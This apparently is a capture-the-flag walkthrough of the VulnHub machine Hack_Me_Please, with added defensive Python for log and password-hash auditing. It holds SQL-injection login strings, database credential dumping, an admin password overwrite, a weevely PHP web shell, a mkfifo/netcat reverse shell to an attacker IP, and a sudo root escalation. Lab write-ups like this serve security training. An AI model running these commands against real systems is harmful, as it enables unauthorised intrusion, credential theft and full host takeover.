Hack_Me_Please: JS information disclosure and second-level directory enumeration

[OSCP] Hack_Me_Please: JS information disclosure, second-level directory enumeration

Target VM: https://www.vulnhub.com/entry/hack-me-please-1,731/

External foothold

Host discovery & port scanning

Port 80 serves a static page.


Test whether MySQL accepts remote connections (it does).

Tip: ERROR 2026 (HY000): TLS/SSL error: self-signed certificate in certificate chain. This error means certificate verification failed while the client was setting up the TLS connection to the server.

There are usually two ways around it (both disable TLS, so the session then runs unencrypted):

  • add the option --skip-ssl
  • add the option --ssl-mode=DISABLED


The directory scan turns up an .html page rather than PHP, so for directory brute-forcing you need wfuzz or gobuster.


Since it is a static page, open the browser console directly; a comment there mentions /seeddms51x/seeddms-5.1.22/

// make sure this js file matches the app installed on our server endpoint: /seeddms51x/seeddms-5.1.22/
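As an added defender-side check (not part of the original write-up), the Python below pulls HTML, block and line comments out of a page and flags any internal paths they disclose, run here over a constructed sample that mimics the comment above; the path regex and the sample page are assumptions made for the demonstration.

```python
import re

# Constructed sample page (not the box's real HTML): a JS comment names the
# install path of the backend application, exactly the kind of leak found above.
SAMPLE_HTML = """<html><body>
<!-- TODO: remove before release -->
<script>
// make sure this js file matches the app installed on our server endpoint: /seeddms51x/seeddms-5.1.22/
var api = "/api/v1/";
/* old admin panel lived at /legacy-admin/ */
</script>
</body></html>"""

COMMENT_RE = re.compile(
    r"<!--(.*?)-->"              # HTML comments
    r"|/\*(.*?)\*/"              # block comments
    r"|(?<![:'\"])//([^\n]*)",   # line comments, but not the // inside http://
    re.DOTALL,
)
# An absolute path with at least one slash-terminated segment, not glued to a word.
PATH_RE = re.compile(r"(?<![\w.])/(?:[\w.-]+/)+")

def extract_comments(text):
    """Return the body of every HTML, block and line comment in `text`."""
    out = []
    for m in COMMENT_RE.finditer(text):
        body = next(g for g in m.groups() if g is not None)
        out.append(body.strip())
    return out

def find_path_leaks(text):
    """Paths disclosed inside comments only, deduplicated, in order of appearance."""
    seen = []
    for comment in extract_comments(text):
        for path in PATH_RE.findall(comment):
            if path not in seen:
                seen.append(path)
    return seen

if __name__ == "__main__":
    for path in find_path_leaks(SAMPLE_HTML):
        print("path disclosed in a comment:", path)
```

Paths in live code (the `var api` line) are left alone on purpose; the point is what ships to the client in comments that a release build should have stripped.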


Visit the application:

http://10.10.10.201/seeddms51x/seeddms-5.1.22/


After a series of attempts:

' or 1=1 --+
' or 1=1 -- +
' or 1=1#
" or 1=1 --+
" or 1=1 -- +
" || 1=1 -- +
" || 1=1 --+
" || 1=1 #


Continuing enumeration: the parent directory can be scanned as well.


gobuster dir -u http://10.10.10.201/seeddms51x -w /data/SecLists_Dict/Discovery/Web-Content/directory-list-1.0.txt -x html,txt,php,js


Three directories are exposed:

/conf
/www
/pear


/conf/settings.xml


Hand it to an AI to summarise (note: AI use is strictly prohibited in the OSCP exam).
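From the detection side, as an added example that is not part of the write-up: the gobuster run and the read of /conf/settings.xml both leave a recognisable trace in the web server's access log. The Python below parses constructed Apache combined-log lines (the lines, the threshold and the sensitive-path list are assumptions) and flags the scanning source and the successful config read.

```python
import re
from collections import defaultdict

# Constructed Apache combined-log lines (not taken from the box) shaped like the
# traffic the gobuster run above would leave: a burst of 404s from one source,
# then a successful read of the configuration file.
SAMPLE_LOG = """\
10.10.10.128 - - [08/Feb/2025:14:11:58 +0000] "GET /seeddms51x/admin HTTP/1.1" 404 437 "-" "gobuster/3.6"
10.10.10.128 - - [08/Feb/2025:14:11:58 +0000] "GET /seeddms51x/backup HTTP/1.1" 404 437 "-" "gobuster/3.6"
10.10.10.128 - - [08/Feb/2025:14:11:59 +0000] "GET /seeddms51x/test.php HTTP/1.1" 404 437 "-" "gobuster/3.6"
10.10.10.128 - - [08/Feb/2025:14:11:59 +0000] "GET /seeddms51x/conf HTTP/1.1" 301 312 "-" "gobuster/3.6"
10.10.10.128 - - [08/Feb/2025:14:17:42 +0000] "GET /seeddms51x/conf/settings.xml HTTP/1.1" 200 9121 "-" "Mozilla/5.0"
192.168.1.5 - - [08/Feb/2025:14:12:10 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# source IP, method, path, status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Paths a web server should never answer with 200; /conf/ is where SeedDMS
# keeps the settings.xml that leaked the database password on this box.
SENSITIVE = ("/conf/", "/.git/", "/.env")

def parse(log):
    """Yield (ip, method, path, status) for every well-formed line."""
    for line in log.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.group(1), m.group(2), m.group(3), int(m.group(4))

def find_bruteforce(log, threshold=3):
    """Sources with at least `threshold` distinct 404 paths: a directory scan."""
    misses = defaultdict(set)
    for ip, _, path, status in parse(log):
        if status == 404:
            misses[ip].add(path)
    return {ip: len(p) for ip, p in misses.items() if len(p) >= threshold}

def find_config_reads(log):
    """Successful (2xx) requests for any path under SENSITIVE."""
    return [(ip, path) for ip, _, path, status in parse(log)
            if 200 <= status < 300 and any(s in path for s in SENSITIVE)]

if __name__ == "__main__":
    print("scanning sources:", find_bruteforce(SAMPLE_LOG))
    print("config reads:", find_config_reads(SAMPLE_LOG))
```

The 301 for /seeddms51x/conf is the directory listing being reachable at all; the fix on the server side is to deny the conf directory to the web server entirely rather than to tune the detector.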


With the database password in hand, log in remotely:

┌──(root㉿kali)-[/data/demo]
└─# mysql -u seeddms -h 10.10.10.201 --skip-ssl -p
Enter password:
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 72
Server version: 8.0.25-0ubuntu0.20.04.1 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| seeddms            |
| sys                |
+--------------------+
5 rows in set (0.006 sec)

MySQL [(none)]> use seeddms
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [seeddms]> show tables;
+------------------------------+
| Tables_in_seeddms            |
+------------------------------+
| tblACLs                      |
| tblAttributeDefinitions      |
| tblCategory                  |
| tblDocumentApproveLog        |
-------------------------------------------
| tblWorkflowTransitions       |
| tblWorkflows                 |
| users                        |
+------------------------------+
43 rows in set (0.002 sec)

MySQL [seeddms]> select * from users;
+-------------+---------------------+--------------------+-----------------+
| Employee_id | Employee_first_name | Employee_last_name | Employee_passwd |
+-------------+---------------------+--------------------+-----------------+
|           1 | saket               | saurav             | Saket@#$1337    |
+-------------+---------------------+--------------------+-----------------+
1 row in set (0.002 sec)

Saket@#$1337 turns out not to work for logging in.


MySQL [seeddms]> select * from tblUsers;
+----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+
| id | login | pwd                              | fullName      | email              | language | theme | comment | role | hidden | pwdExpiration       | loginfailures | disabled | quota | homefolder |
+----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+
|  1 | admin | f9ef2c539bad8a6d2f3432b6d49ab51a | Administrator | address@server.com | en_GB    |       |         |    1 |      0 | 2021-07-13 00:12:25 |             0 |        0 |     0 |       NULL |
|  2 | guest | NULL                             | Guest User    | NULL               |          |       |         |    2 |      0 | NULL                |             0 |        0 |     0 |       NULL |
+----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+
2 rows in set (0.001 sec)


Reversing the hash failed, so the remaining option is to modify the data: set the password to 123456, whose MD5 is e10adc3949ba59abbe56e057f20f883e.


update tblUsers set pwd='e10adc3949ba59abbe56e057f20f883e' where login='admin';

After the update, login succeeds.
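Why a single UPDATE with md5('123456') is enough: the pwd column holds a bare, unsalted MD5. As an added defender-side illustration (not part of the write-up), the Python below audits a constructed tblUsers-shaped list for that storage format and shows the salted PBKDF2 form a hardened application would store and verify instead; the row values, the denylist and the hash string layout are assumptions for the example.

```python
import hashlib
import hmac
import os
import re

# Constructed rows (not the dump above) in the shape of tblUsers(login, pwd).
# The admin value is the unsalted MD5 of "123456" that the UPDATE writes in.
USERS = [
    ("admin", "e10adc3949ba59abbe56e057f20f883e"),
    ("guest", None),
]
MD5_RE = re.compile(r"^[0-9a-f]{32}$")
# Tiny constructed list of passwords an audit should refuse to accept.
DENYLIST = ["123456", "password", "admin"]

def audit_pwd_column(rows):
    """Flag each login whose stored value is a bare unsalted MD5 or is missing."""
    findings = {}
    for login, pwd in rows:
        if pwd is None:
            findings[login] = "no password set"
        elif MD5_RE.match(pwd):
            weak = next((p for p in DENYLIST
                         if hashlib.md5(p.encode()).hexdigest() == pwd), None)
            findings[login] = "unsalted md5" + (f", equals denylisted {weak!r}" if weak else "")
    return findings

def make_hash(password, salt=None, rounds=200_000):
    """Salted PBKDF2-HMAC-SHA256 as a self-describing string: algo$rounds$salt$dk."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)
    return f"pbkdf2_sha256${rounds}${salt.hex()}${dk.hex()}"

def verify(password, stored):
    """Recompute with the stored salt and rounds; compare in constant time."""
    algo, rounds, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(dk.hex(), dk_hex)

if __name__ == "__main__":
    print(audit_pwd_column(USERS))
    print(verify("123456", make_hash("123456")))
```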


There is one more setting worth collecting from MySQL (when misconfigured it can lead straight to a shell):

MySQL [seeddms]> SHOW VARIABLES LIKE 'secure_file_priv';
+------------------+-----------------------+
| Variable_name    | Value                 |
+------------------+-----------------------+
| secure_file_priv | /var/lib/mysql-files/ |
+------------------+-----------------------+
1 row in set (0.019 sec)

Back in the authenticated admin panel, clicking Add document shows that files can be uploaded.

Use weevely to generate a PHP web shell (it is cross-platform, stealthy [better evasion], and supports many functions):

weevely generate cmd shell.php


Upload it.


So how do we find the path of the uploaded shell? Searching past vulnerabilities for this application turns up a command-execution issue.

Take a look:

The document ID is needed:

 example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd

The full URL is:

http://10.10.10.201/seeddms51x/data/1048576/10/1.php


Internal penetration

Connect to the web shell with weevely:

weevely terminal http://10.10.10.201/seeddms51x/data/1048576/10/1.php cmd


Reverse shell:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.10.128 1234 >/tmp/f


Upgrade to an interactive terminal:

python2 -c 'import pty; pty.spawn("/bin/bash")'

During local enumeration, a logrotate cron job stands out:

www-data@ubuntu:/var/www/html/seeddms51x/data/1048576/10$ ls -al /etc/cron*
ls -al /etc/cron*
-rw-r--r-- 1 root root 1042 Feb 13  2020 /etc/crontab

/etc/cron.d:
total 36
drwxr-xr-x   2 root root  4096 Jul  2  2021 .
drwxr-xr-x 133 root root 12288 Jul  3  2021 ..
-rw-r--r--   1 root root   102 Feb 13  2020 .placeholder
-rw-r--r--   1 root root   285 Jul 16  2019 anacron
-rw-r--r--   1 root root   201 Feb 13  2020 e2scrub_all
-rw-r--r--   1 root root   712 Jun 20  2021 php
-rw-r--r--   1 root root   191 Jul  2  2021 popularity-contest

/etc/cron.daily:
total 68
drwxr-xr-x   2 root root  4096 Jul  2  2021 .
drwxr-xr-x 133 root root 12288 Jul  3  2021 ..
-rw-r--r--   1 root root   102 Feb 13  2020 .placeholder
-rwxr-xr-x   1 root root   311 Jul 16  2019 0anacron
-rwxr-xr-x   1 root root   539 Apr 13  2020 apache2
-rwxr-xr-x   1 root root   376 Dec  4  2019 apport
-rwxr-xr-x   1 root root  1478 Apr  9  2020 apt-compat
-rwxr-xr-x   1 root root   355 Dec 29  2017 bsdmainutils
-rwxr-xr-x   1 root root   384 Nov 19  2019 cracklib-runtime
-rwxr-xr-x   1 root root  1187 Sep  5  2019 dpkg
-rwxr-xr-x   1 root root   377 Jan 21  2019 logrotate
-rwxr-xr-x   1 root root  1123 Feb 25  2020 man-db
-rwxr-xr-x   1 root root  4574 Jul 18  2019 popularity-contest
-rwxr-xr-x   1 root root   214 Dec  7  2020 update-notifier-common

www-data@ubuntu:/var/www/html/seeddms51x/data/1048576/10$ logrotate --version
logrotate --version
logrotate 3.14.0

    Default mail command:       /usr/bin/mail
    Default compress command:   /bin/gzip
    Default uncompress command: /bin/gunzip
    Default compress extension: .gz
    Default state file path:    /var/lib/logrotate/status
    ACL support:                yes
    SELinux support:            yes

Unfortunately this cannot be exploited: the version is too new.

Then I thought of the Moonlight page seen at the start; there is a privilege-escalation entry for it.


The PoC is written in C#, so it most likely does not apply to Linux.


Think about what has not been used yet: the users table in MySQL earlier contained one user, with the password

Saket@#$1337


Checking /etc/passwd, that user exists on the system.


www-data@ubuntu:/var/www/html/seeddms51x/seeddms-5.1.22$ su saket
su saket
Password: Saket@#$1337

To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

saket@ubuntu:/var/www/html/seeddms51x/seeddms-5.1.22$

saket@ubuntu:/var/www/html/seeddms51x/seeddms-5.1.22$ sudo -l
sudo -l
[sudo] password for saket: Saket@#$1337

Matching Defaults entries for saket on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User saket may run the following commands on ubuntu:
    (ALL : ALL) ALL
saket@ubuntu:/var/www/html/seeddms51x/seeddms-5.1.22$ sudo -i
sudo -i
root@ubuntu:~# whoami
whoami
root

Privilege escalation complete.
